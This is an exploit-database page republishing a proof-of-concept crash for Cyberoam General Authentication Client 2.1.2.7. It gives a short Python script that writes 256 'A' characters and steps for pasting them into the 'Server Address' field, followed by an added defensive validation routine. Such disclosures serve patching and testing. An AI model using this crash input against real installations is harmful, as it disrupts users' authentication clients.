Cyberoam General Authentication Client 2.1.2.7 Server Address Denial of Service (PoC)

CVE: (none listed)
Category: CWE-401
Price: Unknown
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2019-05-30
CPE: cpe:/a:cyberoam:general_authentication_client:2.1.2.7
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS: 0.02163
EPSSP: 0.45478

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050307

Below is a copy:

Cyberoam General Authentication Client 2.1.2.7 Server Address Denial of Service (PoC)
#Exploit Title: Cyberoam General Authentication Client 2.1.2.7 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/Cyberoam%20General%20Authentication%20Client%202.1.2.7.zip
#Tested Version: 2.1.2.7
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: cgac_2.1.2.7.py
#2.- Open cgac_2.1.2.7.txt and copy content to clipboard
#3.- Open Cyberoam General Authentication Client
#4.- In "Server Address" field paste Clipboard
#5.- Click on "Test"
#6.- Crashed! 

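# Build a 256-character string of "A" for the "Server Address" field
cod = "\x41" * 256

# Write it to the text file opened in step 2
with open('cgac_2.1.2.7.txt', 'w') as f:
    f.write(cod)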
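
A defensive counterpart to the reproduction steps above, as an added example that is not part of the original advisory or of Cyberoam's code: a length and syntax check applied to a "Server Address" value before it reaches any connection logic. The page does not state the root cause of the crash; the function name, the exception class and the RFC 1035 limits (253 and 63 characters) are assumptions chosen for illustration.

```python
import ipaddress
import re

# Assumed limits (RFC 1035 text-form host names); the page gives no vendor limit.
MAX_HOST_LEN = 253
MAX_LABEL_LEN = 63
_LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?")


class InvalidServerAddress(ValueError):
    """The field content must not be handed to connection code."""


def validate_server_address(raw):
    """Return a normalised IP or host name, or raise InvalidServerAddress."""
    if not isinstance(raw, str):
        raise InvalidServerAddress("not a string")
    value = raw.strip()
    if not value:
        raise InvalidServerAddress("empty value")
    # Check total length first, so oversized pasted content is rejected
    # before any parsing or copying happens.
    if len(value) > MAX_HOST_LEN:
        raise InvalidServerAddress("too long: %d characters" % len(value))
    try:
        return str(ipaddress.ip_address(value))  # IPv4 or IPv6 literal
    except ValueError:
        pass  # not an IP literal, so validate it as a host name
    host = value[:-1] if value.endswith(".") else value  # allow one root dot
    for label in host.split("."):
        if len(label) > MAX_LABEL_LEN or not _LABEL.fullmatch(label):
            raise InvalidServerAddress("invalid label: %r" % label[:16])
    return host.lower()


if __name__ == "__main__":
    # Constructed sample inputs; the 256-character one has the size used in the PoC.
    for sample in ("10.0.0.1", "auth.example.test", "A" * 256, "A" * 200):
        try:
            print("accepted:", validate_server_address(sample))
        except InvalidServerAddress as exc:
            print("rejected:", exc)
```

The same bound belongs in the native client as well: the receiving buffer should be sized from the validated length, and the "Test" action should refuse to run while the field fails validation.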
